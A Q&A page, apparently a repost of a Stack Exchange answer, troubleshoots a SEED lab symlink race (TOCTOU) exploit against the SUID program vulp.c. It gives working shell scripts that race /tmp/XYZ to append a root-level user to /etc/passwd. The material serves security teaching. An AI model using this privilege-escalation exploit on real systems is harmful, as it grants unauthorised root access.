You need to enable JavaScript to run this app.
优惠活动
大模型
产品
解决方案
定价
更多

Ubuntu SEED环境下利用并发漏洞突破锁定文件权限的技术问询

Troubleshooting "Permission Denied" in Your SUID TOCTOU Exploit

Alright, let's break down why you're hitting "permission denied" and fix your exploit step by step. You're targeting a classic Time-of-Check to Time-of-Use (TOCTOU) vulnerability in vulp.c, but your current scripts are misusing the race condition, and you've got the exploit logic backwards.

1. Why You're Seeing "Permission Denied"

Let's look at the critical flow in vulp.c that's tripping you up:

if(!access(fn, W_OK)){  // This checks write permission AS THE SEED USER
    fp = fopen(fn, "a+");  // But this opens the file AS ROOT (thanks to SUID)
    // ... write user input to the file
}

Your attack.sh switches /tmp/XYZ to point to either /home/seed/vulp or /etc/passwd—neither of which the seed user has write permission for. So every time access(fn, W_OK) runs, it fails, and you get the "No permission" message.

The exploit relies on tricking the program into passing the access check (using a file seed can write to) then swapping the link to your target file (like /etc/passwd) before fopen executes.

2. Fix the Core Exploit Logic

Here's the correct approach:

  • Create a temporary file that seed owns and can write to (so access passes).
  • Continuously toggle /tmp/XYZ between this temp file and /etc/passwd (this creates the race window).
  • Run vulp repeatedly with crafted input until the race wins, and your input gets written to /etc/passwd with root permissions.

3. Corrected Scripts & Setup

First, Prepare the Crafted Input

Create a passwd_input file with a new root-level user. First generate a password hash using openssl passwd -1 (example uses password "hacker123"):

# Generate the hash (run this first, copy the output)
openssl passwd -1
# Now create the input file (replace the hash below with your generated one)
echo "hacker:\$1\$abc\$abcdefghijklmnopqrstuvwx:0:0:Hacker User:/root:/bin/bash" > passwd_input

(Make sure to escape the $ signs so the shell doesn't expand them prematurely.)

Corrected attack.sh

This script runs forever, swapping /tmp/XYZ between a writable temp file and /etc/passwd to create the race condition:

#!/bin/sh
# Create a temp file we definitely have write access to
TMP_FILE="/tmp/seed_writable_temp"
touch $TMP_FILE

# Loop forever toggling the symlink
while true; do
    ln -sf $TMP_FILE /tmp/XYZ
    ln -sf /etc/passwd /tmp/XYZ
done

Corrected check.sh

This script runs vulp repeatedly and stops when our crafted user appears in /etc/passwd:

#!/bin/sh
COUNTER=0

while true; do
    ./vulp < passwd_input
    COUNTER=$((COUNTER + 1))
    # Check if our hacker user has been added to /etc/passwd
    if grep -q "hacker:" /etc/passwd; then
        break
    fi
done

echo "Success! Exploit worked after $COUNTER attempts."
echo "You can now switch to the hacker user with: su hacker"

4. Run the Exploit

  1. Make sure your scripts are executable:
chmod +x attack.sh check.sh
  1. Run both scripts in parallel (use parallel or two separate terminals for better visibility):
parallel -j 2 -- './attack.sh' './check.sh'

Or open two terminals:

  • Terminal 1: ./attack.sh
  • Terminal 2: ./check.sh

5. Key Notes

  • Race Luck: This is a race condition, so it might take a few hundred or thousand attempts to win—be patient.
  • /tmp Permissions: Ensure /tmp has default permissions (1777, world-writable with sticky bit) so symlinks work as expected.
  • Cleanup: After testing, don't forget to remove the hacker user from /etc/passwd and delete /tmp/XYZ and the temp file.

内容的提问来源于stack exchange,提问作者Diana G

相关产品推荐
方舟 Agent Plan

超全模态模型 × Harness 升级,最新支持 Deepseek-V4.1-Flash、GLM-5.3 系列、Doubao-Seedream-5.0-pro、Kimi-K3 (部分), 限时 9.9 元起

最近更新时间:2026.05.06 22:47:43